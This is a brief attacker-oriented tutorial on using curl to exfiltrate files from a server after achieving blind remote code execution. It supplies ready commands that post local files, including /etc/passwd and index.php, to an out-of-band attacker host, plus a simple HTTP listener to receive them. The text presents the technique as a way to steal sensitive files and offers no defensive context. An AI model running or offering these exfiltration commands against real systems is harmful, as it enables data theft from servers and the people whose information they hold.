Blind RCE File Exfiltration via curl
If you’ve landed a Blind Remote Code Execution (RCE) but can trigger outbound HTTP requests (OOB — Out of Band), you can steal files from the target server without direct output.
Technique: Using curl with -d @fileWhen you run:
Code:
curl -d @index.php https://OOB_SERVER•
-d @index.php → Reads the entire file index.php and sends it in the HTTP request body. • The OOB server receives the full file contents, even if the RCE output is not directly visible.
Example Exploit Flow:You control an OOB listener:
Code:
python3 -m http.server 8080
or use Burp Collaborator / Interactsh.Trigger the Blind RCE on the target with:
Code:
curl -d @/etc/passwd https://your-server.com
The file contents are sent to your server in the POST request body.
Why This Works
️ The @ syntax in curl tells it to read a local file instead of sending raw text. ️ Perfect for exfiltrating sensitive files